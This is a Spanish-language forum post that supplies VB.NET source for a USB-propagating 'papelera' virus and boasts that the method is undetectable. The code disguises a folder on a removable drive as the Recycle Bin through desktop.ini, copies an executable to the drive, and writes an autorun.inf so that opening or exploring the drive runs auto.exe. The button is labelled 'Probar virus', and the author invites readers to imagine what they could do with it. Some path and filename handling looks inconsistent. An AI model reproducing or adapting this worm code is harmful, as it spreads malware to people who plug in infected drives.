Se que muchos mas de alguna ves se habran preguntado como se propaga el virus de la papelera que metodo utiliza para crear el autorun, bueno analisando muchos metodos llege a mi propia cunclusion y mejore la forma de uso de esta propagacion haciendo de ella indetectable hasta el momento.
Objetos que debemos crear para el buen funcionamiento:
Combobox, con nombre: usbs
Button, con nombre: Button1
Label, con nombre: lis
ahora remplazar todo el codigo del form1 por este: y listo correrlo, analizar su funcionamiento imaginense lo que podrian hacer con esto, todo queda a si imaginacion lol, saludos
Codigo:
Imports System.IO
Public Class Form1
Dim ruta As String = usbs.Text & "Jrjack"
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
usbs.DropDownStyle = ComboBoxStyle.DropDownList
cargausb()
End Sub
#Region "Monitor de usb"
Sub cargausb()
Dim allDrives() As IO.DriveInfo = IO.DriveInfo.GetDrives()
Dim d As IO.DriveInfo
For Each d In allDrives
If d.IsReady = True AndAlso d.DriveType = IO.DriveType.Removable Then
usbs.Items.Add(d).ToString()
usbs.Text = d.ToString
Else
End If
Next
End Sub
Private WM_DEVICECHANGE As Integer = &H219
Public Enum WM_DEVICECHANGE_WPPARAMS As Integer
DBT_CONFIGCHANGECANCELED = &H19
DBT_CONFIGCHANGED = &H18
DBT_CUSTOMEVENT = &H8006
DBT_DEVICEARRIVAL = &H8000
DBT_DEVICEQUERYREMOVE = &H8001
DBT_DEVICEQUERYREMOVEFAILED = &H8002
DBT_DEVICEREMOVECOMPLETE = &H8004
DBT_DEVICEREMOVEPENDING = &H8003
DBT_DEVICETYPESPECIFIC = &H8005
DBT_DEVNODES_CHANGED = &H7
DBT_QUERYCHANGECONFIG = &H17
DBT_USERDEFINED = &HFFFF
End Enum
Protected Overrides Sub WndProc(ByRef m As System.Windows.Forms.Message)
If m.Msg = WM_DEVICECHANGE Then
Select Case m.WParam
Case WM_DEVICECHANGE_WPPARAMS.DBT_DEVICEARRIVAL
usbs.Items.Clear()
cargausb()
Case WM_DEVICECHANGE_WPPARAMS.DBT_DEVICEREMOVECOMPLETE
usbs.Items.Clear()
cargausb()
End Select
End If
MyBase.WndProc(m)
End Sub
#End Region
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
'para la creacion de desktop.ini
Try
My.Computer.FileSystem.CreateDirectory(ruta)
Using escritor As StreamWriter = New StreamWriter(ruta & "\\desktop.ini")
escritor.WriteLine("[.ShellClassInfo]" & vbNewLine & "CLSID={645FF040-5081-101B-9F08-00AA002F954E}")
End Using
Catch ex As Exception
lis.Text = "desktop No copiado correctamente...."
End Try
'---------------------------------------------
'Para la creacion del autorun
Try
If My.Computer.FileSystem.FileExists(usbs.Text & "autorun.inf") Then
My.Computer.FileSystem.DeleteFile(usbs.Text & "autorun.inf")
My.Computer.FileSystem.CopyFile("l.exe", ruta)
Using esc As StreamWriter = New StreamWriter(ruta & "autorun.inf")
esc.WriteLine("[Autorun]" & vbNewLine & _
"Open=" & ruta & "\\auto.exe" & vbNewLine & _
"Icon=%%windir%%\\System32\\SHELL32.DLL,4" & vbNewLine & _
"UseAutoPlay=1" & vbNewLine & "Action= Abrir Memoria Usb" & _
vbNewLine & "Action= @" & ruta & "\\auto.exe" & _
vbNewLine & "Shell\\Open=Abrir" & vbNewLine & "Shell\\Open=Abrir Memoria Usb" & vbNewLine & _
"Shell\\Open\\Command=" & ruta & "\\auto.exe" & vbNewLine & "Shell\\Open\\Default=1" & _
vbNewLine & "Shell\\Explore=Explorar" & vbNewLine & "Shell\\Explore\\Command=" & ruta & "\\auto.exe")
End Using
lis.Text = "Autorun.inf copiado correctamente...."
Else
End If
Catch ex As Exception
End Try
'---------------------------------------------
End Sub
Private Sub usbs_SelectedIndexChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles usbs.SelectedIndexChanged
End Sub
End Class
y para los araganes no creo que existan les dejo el form1.designer:
<Global.Microsoft.VisualBasic.CompilerServices.DesignerGenerated()> _
Partial Class Form1
Inherits System.Windows.Forms.Form
'Form reemplaza a Dispose para limpiar la lista de componentes.
<System.Diagnostics.DebuggerNonUserCode()> _
Protected Overrides Sub Dispose(ByVal disposing As Boolean)
Try
If disposing AndAlso components IsNot Nothing Then
components.Dispose()
End If
Finally
MyBase.Dispose(disposing)
End Try
End Sub
'Requerido por el Diseñador de Windows Forms
Private components As System.ComponentModel.IContainer
'NOTA: el Diseñador de Windows Forms necesita el siguiente procedimiento
'Se puede modificar usando el Diseñador de Windows Forms.
'No lo modifique con el editor de código.
<System.Diagnostics.DebuggerStepThrough()> _
Private Sub InitializeComponent()
Me.usbs = New System.Windows.Forms.ComboBox
Me.Button1 = New System.Windows.Forms.Button
Me.lis = New System.Windows.Forms.Label
Me.SuspendLayout()
'
'usbs
'
Me.usbs.FormattingEnabled = True
Me.usbs.Location = New System.Drawing.Point(32, 12)
Me.usbs.Name = "usbs"
Me.usbs.Size = New System.Drawing.Size(121, 21)
Me.usbs.TabIndex = 0
'
'Button1
'
Me.Button1.Location = New System.Drawing.Point(54, 65)
Me.Button1.Name = "Button1"
Me.Button1.Size = New System.Drawing.Size(150, 38)
Me.Button1.TabIndex = 1
Me.Button1.Text = "Probar virus"
Me.Button1.UseVisualStyleBackColor = True
'
'lis
'
Me.lis.AutoSize = True
Me.lis.Location = New System.Drawing.Point(105, 118)
Me.lis.Name = "lis"
Me.lis.Size = New System.Drawing.Size(39, 13)
Me.lis.TabIndex = 2
Me.lis.Text = "Label1"
'
'Form1
'
Me.AutoScaleDimensions = New System.Drawing.SizeF(6.0!, 13.0!)
Me.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font
Me.ClientSize = New System.Drawing.Size(312, 162)
Me.Controls.Add(Me.lis)
Me.Controls.Add(Me.Button1)
Me.Controls.Add(Me.usbs)
Me.Name = "Form1"
Me.Text = "Form1"
Me.ResumeLayout(False)
Me.PerformLayout()
End Sub
Friend WithEvents usbs As System.Windows.Forms.ComboBox
Friend WithEvents Button1 As System.Windows.Forms.Button
Friend WithEvents lis As System.Windows.Forms.Label
End Class
Chat Sentinela
